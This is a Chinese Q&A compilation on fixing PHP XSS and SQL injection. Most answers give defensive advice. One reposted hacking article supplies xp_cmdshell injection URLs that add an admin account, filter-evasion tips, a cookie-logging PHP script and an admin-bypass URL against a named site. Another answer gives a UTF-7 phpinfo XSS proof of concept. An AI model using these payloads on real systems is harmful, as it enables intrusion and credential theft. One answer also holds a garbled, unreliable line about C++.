php跨站腳本攻擊

Ⅰ ecshop article_cat.php文件 跨站腳本攻擊漏洞 怎麼修復

把article_cat.php文件中的

if(isset($_REQUEST['keywords']))
{
$keywords=addslashes(htmlspecialchars(urldecode(trim($_REQUEST['keywords']))));
$pager['search']['keywords']=$keywords;
$search_url=substr(strrchr($_POST['cur_url'],'/'),1);

改為

if(isset($_REQUEST['keywords']))
{
$keywords=addslashes(htmlspecialchars(urldecode(trim($_REQUEST['keywords']))));
$keywords=strFilter($keywords);
$pager['search']['keywords']=$keywords;//AddECShop.Vc
$search_url=substr(strrchr($_POST['cur_url'],'/'),1);
$search_url=strFilter($search_url);//AddECShop.Vc

Ⅱ 看看我這個PHP代碼怎麼防止跨站腳本攻擊（XSS）

很遺憾，你這代碼亂得很，而且看起來是後端處理代碼，並不是xss關鍵處理代碼，xss一般在入庫前進行轉義

Ⅲ 請問如何解決跨站問題

最近腳本攻擊好象是很流行的，不過早在很久前就有這個了！腳本攻擊嚴格的說應該是一件藝術而不是漏洞！首先我們先要知道什麼是腳本，腳本就是運行在網頁伺服器上的文本程序，例如：ASP、PHP、CGI、JSP、ISAP等等，腳本的攻擊就是利用這些文件的設置和編寫時的錯誤或者疏忽不當，攻擊者就可以利用這些來達到自己攻擊目的，如果一個伺服器存在這些漏洞，那麼它的淪陷也是時間的問題！
這些文本文件一般都是要結合資料庫來使用的，這些資料庫有ACCESS、MSsql、MYSQL、Oracle等！腳本攻擊就是針對這些資料庫來配合腳本對一些變數的過濾不嚴的問題來達到得到用戶密碼等敏感信息，修改資料庫等目的！下面我就針對這些來分別舉例說明！
一、跨站腳本的攻擊
腳本的跨站（CSS/XSS）就是利用程序對用戶提交的變數不嚴，大多數是利用多媒體標簽，前段時間比較流行的flash跨站就是利用的這個，比如我在[FLASH=450,350][/FLASH]之間插入一個我自己作好的一個swf文件，swf文件里我們用geturl里加上javascript:window.open('http://qfaq.yeah.net'就可以讓他打開清風安全網的網站，如果這里是一個木馬網頁，呵呵，，，你就等著中木馬吧！還有就是竊取用戶的cookie，例如我們利用也就是圖片的跨站，在這個裡面插入
這段地址即可得到！如果將javascript過濾掉後怎麼辦？
好，我們在看看下面這段代碼：
[upload=swf]uploadImages/200310812145390577.swf?">[/upload]
怎麼樣，還是能將你的信息得到的，而且還不會彈出對話框！
另外在joekoe論壇程序里還有一個這樣的問題，比如你發個帖子里有[DIR][/DIR]就會彈出一個播放器的安裝程序，呵呵，如果是一個黑心的站長利用這個來放馬，那後果就不用說了吧！
解決辦法：現在還沒有好的方法解決這個問題，你要做的就是將多媒體的標簽刪掉！
另附ASP和PHP的跨站代碼
php如下
$info = getenv("QUERY_STRING";
if ($info) {
$fp = fopen("test.txt","a";
fwrite($fp,$info."n";
fclose($fp);
}
?>

asp如下

二、sql injection
是現在最熱門的，也是本文要重點說的！
1、ASP+ACCESS資料庫類型的SQL注射
現在的大多數網站是採用的這個組合，但是如果在ASP程序中沒有對用戶提交的變數充分過濾的話就可能導致管理員密碼被猜到，整個網站的信息就會暴漏無移~！
在大多數ASP站點中，我們並不知道其程序代碼，靠任何掃描器也不可能發現SQL injection漏洞，這時就要靠手工檢測了，由於我們執行SQL語句要用到單引號、分號、逗號、冒號和「--」，所以我們就在可修改的URL後加上以上符號，或在表單中的文本框加上這些符號！比如比較經典的金梅系統漏洞，在movie.aps中有怎麼一段代碼：
articleid=request("id"
set rs=server.createobject("adodb.recordset"
sql="update learning set hits=hits+1 where articleID="&articleid

--------------------------------------------------------------------------------

2 [轉帖]腳本安全和利用
rs.open sql,conn,1,3
sql="select * from learning where articleid="&articleid
rs.open sql,conn,1,1

articleid未經任何檢查便提交了，所以我們就可以自己構造一些SQL語句來提交上去！具體的利用過程請看拙作《SQL注入完整篇》和《SQL注入的補充》的動畫教程，這里我就不在重復的說了！
2、ASP+MYSQL資料庫類型的利用
MYSQL資料庫簡單使用和強大的功能一直以來都是網管們的最愛！但是如果是ASP中沒有對變數過濾的話，我們就可以來直接的到他的系統管理員許可權！
比如動網論壇、BBSXP論壇的SQL版有好幾個文件都沒有對ID過濾，所以我們只要找到他的存在問題的頁面就可以了，
看這段代碼：rs.open "select * from news where newsid=" & cstr(request("newsid"),conn,1,1
比如我們提交：
http://XXX/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user xuehan ilovexuehan /add';--
http://XXX/show.asp?id=1;exec master.dbo.xp_cmdshell 'net localgroup administrators xuehan /add';--
看到了嗎？我們已經在系統中田加了一個xuehan 密碼是ilovexuehan的管理員帳號，以下的事情你就自己來做吧，呵呵，，，不用我來教了吧！！！
如果過濾了分號和單引號怎麼辦？呵呵，我們只要將我們的命令形式轉換一下，比如我們轉換成十六進制或者別的形式就可以繼續注入了，還有就是他如果過濾了xp_cmdshell 我們也可以解決，我們可以寫成xp'+'_cmd'+'shell形式，如果他將xp_cmdshell 擴展刪掉，我們可以通過xplog70.dll文件來恢復，呵呵，，，具體自己查找下資料庫的知識，當然我們也可以用別的擴展！所以說SQL injection不僅僅是一門技術，更要有靈活的頭腦和扎實的資料庫知識，特別是對SQL語言的掌握程度，如果不會SQL語言，你永遠都是生搬硬套，遇到障礙就過不去了！
3、PHP+MYSQL資料庫類型
PHP+MYSQL一直以來都認為是最安全的組合，不過一些文件沒有過濾單引號、反斜線等，我們也可以來進行注入，不過在最新的php安裝程序里的php.ini文件默認都是對這些過濾掉的，所以很大情況下我們是無法對進行注入的，不過也有許多牛人們可以饒過這個限制的！由於我的PHP和MYSQL不是太懂，所以就不能來具體舉例來說明了，大家要是有興趣可以去找寫資料來看！！！
需要從根本上解決解決SQL Injection問題。還得從程序本身入手。過濾不能單純的過濾URL所提交的參數，在表單里的也要過濾，value=後面的可以修改的數據，修改後可以提交到伺服器，總之對所有的表單提交的數據以及用戶可能對HTML源文件進行修改來控制的所有來自Web伺服器外部的數據進行過濾或轉換，對單引號、雙引號、分號「--」還有對數字鍵上面的所有特殊字元進行過濾，還有QUERY_STRING環境變數。在伺服器上刪除一些危險的擴展存儲過程，比如xp_cmdshell。有條件裝個IDS更好，不敢說無堅不摧，但至少可以阻擋大部分攻擊者。
三、一些別的腳本攻擊
有些程序沒有對cookie或者session進行過濾和檢查，就造成了用戶可以非法修改提交頁面，自己提交修改數據，比如像海陽頂端網木馬的以前版本對session沒有過濾，我們就可以饒過密碼的驗證來到達真正的頁面，還有就是post提交的問題，像leadbbs的2.77版本就是沒有充分的過濾，我們就可以把管理員的密碼修改成自己的密碼！
還有一個腳本的攻擊例子，在Discuz! 2.0 論壇里，因為個人屬性缺乏必要的安全確認，所以很容易誘使其他會員自動修改其個人屬性內容，特別是注冊郵件信息，這關系著登陸密碼的修改。
比如我們發個帖子，寫上

誘使會員點擊這個頁面後，就會自動修改該會員注冊的email地址為crack.x.h2163.com。當然為了隱蔽性，可以更新後自動關閉，然後調用另外一個假地址。
當然我們也可以利用這個漏洞進行欺騙、隱藏來誘惑管理員來修改我們為管理員等等！大家自己去學習吧！
看了這么多枯燥的東西下面我們再來看看另外一個好玩的漏洞，在百渡里搜索」傳奇留言薄「找幾個免費的留言本進去，找到他的登陸頁面，我找到的一個是：
http://www.conanshome.com/guestbook/login.asp
我們再來看看下面這個連接：
http://www.conanshome.com/guestbook/admin.asp?adminid=admin
哈，怎麼我們就闖入後台了！！！
什麼原因，自己去琢磨吧！
後記：腳本的攻擊可以說是防不勝防的，我們所要做的只能是提高編寫程序的嚴謹態度，人為的因素在腳本攻擊中是最重要的！
聲明：本文提到的漏洞都有一定的攻擊性，我們的目的是探討技術，搞破壞的是小人！所造成的一切後果於作者無關！由於作者水平有限，文中難免有錯誤之處，歡迎指出！

Ⅳ 跨站腳本攻擊漏洞需要用到什麼編程語言

這里有5種編程語言，可以對網路安全的問題有所幫助。
C和C++
如果是在網路安全領域，C和C++是相對重要的最基礎的編程語言，這些語言提供了對底層IT基礎設施(如RAM和系統進程)的訪問，如果保護不好，黑客可以很容易地利用這些基礎設施。
C編程語言是大多數操作系統的主幹。它是一種簡潔、靈活和高效的語言，可用於完成多種任務，如加密、圖像處理和socket 網路。
從本質上講，C++通常被認為是C的大哥，它是由crack、meth和steroids混合編譯而成的。而C++是一種主要基於C的源代碼的很棒的語言。有幾個使用C++創建的網路安全程序。例如，Network Mapper，就是是用C+創建的。
下面是C+的創建者Bjarne Stroustrup的一句話：
"C使你很容易射中自己的腳；C+使它變得更難，但當你這樣做時，它會把你的整個腿都炸掉。"
如果你具有使用C/C++編程語言的經驗，你將知道如何應對針對計算環境中較低級別操作的攻擊。
PYTHON
作為一種高級編程語言，Python越來越受到網路專家的歡迎。它之所以吸引人，主要是因為它代碼的可讀性、語法清晰和簡單，以及大量庫的可用性。
因此，無論你想做什麼任務，你都可以使用Python輕松完成任務。例如，你可以使用該語言將TCP數據包發送到計算機，執行惡意軟體分析，並創建入侵檢測系統，而對第三方工具的依賴性最小。
然而，與C/C++不同，Python並不是底層的；因此，它可能無法為提供足夠硬體資源可見性。
學習Python用於網路安全將使你在職業生涯中占據優勢。你將具備編程技能，可以幫助你識別漏洞並發現如何解決它們。
JAVASCRIPT
JavaScript是一種高級編程語言，通常被稱為Web的「通用語言」。JavaScript是支持Internet的核心技術。首先，它是為網頁添加交互性的語言。盡管JavaScript最初僅在Web瀏覽器的客戶端實現，但現在可以在其他類型的主機基礎結構中使用該語言，例如資料庫中的伺服器端和PDF程序等離線應用程序。
因此，由於它的廣泛使用，學習JavaScript可以讓你比黑客領先一步。 你將了解網站和其他應用程序如何工作的概念以及用於抵禦惡意用戶的最佳設計。例如，跨站點腳本是一種基於JavaScript的攻擊，涉及攻擊者在Web應用程序中植入惡意代碼。
如果你有使用JavaScript編程語言的經驗，則可以防止發生此類攻擊。
PHP
PHP是用於開發網站的伺服器端編程語言。由於大多數網站都是使用PHP創建的，因此學習該語言可以讓你了解如何抵禦入侵者。
例如，DDoS（拒絕服務）攻擊通常會嘗試使Web應用程序對預期用戶不可用。
藉助PHP編程知識，再加上JavaScript等其他技術的技能，你可以實現可靠的解決方案來保護Web應用程序。
SQL
SQL（結構化查詢語言）主要用於管理存儲在資料庫中的數據。由於當前數據存儲系統的爆炸式增長，SQL被廣泛用於維護和檢索數據。
同樣，黑客越來越多地編排語言來破壞或泄露存儲的數據。例如，SQL注入攻擊涉及利用SQL漏洞來竊取或修改資料庫中保存的數據。因此，充分了解SQL語言對於網路安全至關重要。
總結
以上並不是網路安全最佳編程語言的詳盡列表。根據你的具體用例，你可能會發現一種語言比其他語言更適合你的工作。
例如，如果你想專注於保護Web應用程序的前端，那麼學習JavaScript可能是你理想的選擇。
盡管如此，要成為一個全面的網路極客，你需要採用

Ⅳ 什麼是phpinfo xss跨站腳本攻擊漏洞

php是一款被廣泛使用的編程語言，可以被嵌套在html里用做web程序開發。phpinfo()是用來顯示當前php環境的一個函數，許多站點和程序都會將phpinfo放在自己的站點上或者在程序里顯示，但是phpinfo里存在一些安全問題，導致精心構造數據就可以產生一個跨站腳本漏洞，可以被用來進行攻擊。

漏洞成因： phpinfo頁面對輸入的參數都做了詳細的過濾，但是沒有對輸出的進行charset的指定，而在一些瀏覽器里如IE7里，你可以讓它自動選擇編碼或者通過一個iframe頁面給它指定編碼，這樣就可以饒過phpinfo的過濾而產生一個跨站腳本漏洞。
漏洞來源: http://www.80sec.com/release/phpinfo-xss.txt
漏洞利用： 利用代碼如下：

<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
<body>
<iframe src="http://www.80sec.com/phpinfo.php?+ADw-SCRIPT+AD4-alert(document.domain);+ADw-/SCRIPT+AD4-=1">

以上代碼在IE7+php 5.2.6測試成功。phpinfo頁面的xss甚至比其他頁面更加危險，因為如果有phpinfo的存在，惡意攻擊者可以利用phpinfo的輸出bypass如httponly和一些基礎認證。
漏洞影響： 影響所有版本的php和瀏覽器IE7
漏洞修補： 建議暫時刪除站點的phpinfo頁面避免被人利用。

Ⅵ php網站用websaber評估有跨站腳本攻擊漏洞

防範的方式也簡單：

1、程序代碼漏洞，這需要有安全意識的程序員才能修復得了，通常是在出現被掛馬以後才知道要針對哪方面入手修復；

2、也可以通過安全公司來解決，國內也就Sinesafe和綠盟等安全公司 比較專業.

3.伺服器目錄許可權的「讀」、「寫」、「執行」，「是否允許腳本」，等等，使用經營已久的虛擬空間提供商的空間，可以有效降低被掛馬的幾率。

我是從事IDC行業的.以上這些也是平時工作中經常遇到的問題.希望我的回答對你有所幫助.

Ⅶ 這個PHP文件被檢測出來跨站腳本攻擊漏洞怎麼修補急急

if($rw_uid = intval($rws[0])) { $rw_uid 貌似是 因為判斷產生的 跨站腳本攻擊漏洞
舉例: $_GET['rewrite'] = '123_js';
那麼 按判斷方式 理想得到的結果是 $_GET['uid'] = 123; $_GET['do'] = 'js';

但是 如果 $_GET['rewrite'] = 'js'; 按照判斷 結果就等於 $_GET['do'] = 'js';

這是驗證不嚴格導致的 如果嚴格要求 闖入的必須是 這種格式 數字_字元串 那麼就得嚴格濾過參數

Ⅷ 如何防止跨站點腳本攻擊

你好~
XSS漏洞產生的原因：

跨站點腳本的主要原因是程序猿對用戶的信任。開發人員輕松地認為用戶永遠不會試圖執行什麼出格的事情,所以他們創建應用程序,卻沒有使用任何額外的代碼來過濾用戶輸入以阻止任何惡意活動。另一個原因是,這種攻擊有許多變體，用製造出一種行之有效的XSS過濾器是一件比較困難的事情。
但是這只是相對的，對用戶輸入數據的」編碼」和」過濾」在任何時候都是很重要的，我們必須採取一些針對性的手段對其進行防禦。

如何創造一個良好的XSS過濾器來阻止大多數XSS攻擊代碼

1 .需要重點」編碼」和」過濾」的對象
The URL
HTTP referrer objects
GET parameters from a form
POST parameters from a form
Window.location
Document.referrer
document.location
document.URL
document.URLUnencoded
cookie data
headers data
database data

防禦XSS有一個原則:
以當前的應用系統為中心，所有的進入應用系統的數據都看成是輸入數據(包括從FORM表單或者從資料庫獲取到的數據)，所有從當前應用系統流出的數據都看作是輸出(包括輸出到用戶瀏覽器或向資料庫寫入數據)
對輸入的數據進行」過濾」，對輸出數據進行」編碼」。這里的」編碼」也要注意，必須針對數據具體的上下文語境進行針對性的編碼。例如數據是輸出到HTML中的那就要進行HtmlEncode，如果數據是輸出到javascript代碼中進行拼接的，那就要進行javascriptEncode。
如果不搞清楚數據具體輸出的語境，就有可能因為HtmlParser()和javascriptParser()兩種解析引擎的執行先後問題導致看似嚴密的」編碼」形同虛設。

2. HtmlEncode HTML編碼
它的作用是將字元轉換成HTMLEntities，對應的標準是ISO-8859-1
為了對抗XSS，在HtmlEncode中要求至少轉換以下字元:
& --> &
< --> <
> --> >
" --> "
' --> '
/ --> /
在PHP中:

htmlentities
http://www.w3school.com.cn/php/func_string_htmlentities.asp
htmlspecialchars
http://www.w3school.com.cn/php/func_string_htmlspecialchars.asp
3. javascriptEncode javascript」編碼」
javascriptEncode與HtmlEncode的編碼方法不同，HtmlEncode是去編碼，而javascriptEncode更多的像轉義，它需要使用」\」對特殊字元進行轉義。從原理上來講，這都符合編碼函數的一個大原則: 將數據和代碼區分開，因為對於HTML Tag來說，我們對其進行」可視化(轉換成可以見字元)」的編碼可以將數據和HTML的界限分開。而對於javascript來說，我們除了要進行編碼之外，還需要對特殊字元進行轉義，這樣攻擊輸入的用於」閉合」的特殊字元就無法發揮作用，從而避免XSS攻擊，除此之外，在對抗XSS時，還要求輸出的變數必須在引號內部，以避免造成安全問題。
escape()
http://www.w3school.com.cn/js/jsref_escape.asp
該方法不會對 ASCII 字母和數字進行編碼，也不會對下面這些 ASCII 標點符號進行編碼： * @ – _ + . / 。其他所有的字元都會被轉義序列(十六進制\xHH)替換。
利用這個編碼函數，不僅能防禦XSS攻擊，還可以防禦一些command注入。

一些開源的防禦XSS攻擊的代碼庫：

PHP AntiXSS
這是一個不錯的PHP庫,可以幫助開發人員增加一層保護，防止跨站腳本漏洞。
https://code.google.com/p/php-antixss/
xss_clean.php filter
https://gist.github.com/mbijon/1098477
HTML Purifier
http://htmlpurifier.org/
xssprotect
https://code.google.com/p/xssprotect/
XSS HTML Filter
http://finn-no.github.io/xss-html-filter/

原文地址：http://resources.infosecinstitute.com/how-to-prevent-cross-site-scripting-attacks/

希望可以幫助到你~望採納哦~謝謝~

Ⅸ 如何修復PHP跨站腳本攻擊漏洞

你這截圖上不是有方法么，檢查後台的代碼，將用戶提交過來的信息進行htmlspecialchars（）後在操作數據。或者自己編寫代碼，將特殊符號進行正則匹配然後給替換掉。

Ⅹ 如何實現php的安全最大化怎樣避免sql注入漏洞和xss跨站腳本攻擊漏洞

使用php安全模式

伺服器要做好管理，賬號許可權是否合理。

假定所有用戶的輸入都是「惡意」的，防止XSS攻擊，譬如：對用戶的輸入輸出做好必要的過濾

防止CSRF，表單設置隱藏域，post一個隨機字元串到後台，可以有效防止跨站請求偽造。

文件上傳，檢查是否做好效驗，要注意上傳文件存儲目錄許可權。

防禦SQL注入。

避免SQL注入漏洞

1.使用預編譯語句

2.使用安全的存儲過程

3.檢查輸入數據的數據類型

4.從資料庫自身的角度考慮，應該使用最小許可權原則，不可使用root或dbowner的身份連接資料庫。若多個應用使用同一個資料庫，也應該為資料庫分配不同的賬戶。web應用使用的資料庫賬戶，不應該有創建自定義函數，操作本地文件的許可權。

避免XSS跨站腳本攻擊

1.假定所有用戶輸入都是「邪惡」的

2.考慮周全的正則表達式

3.為cookie設置HttpOnly,防止cookie劫持

4.外部js不一定可靠

5.出去不必要的HTML注釋

6. 針對非法的HTML代碼包括單雙引號等，使用htmlspecialchars()函數。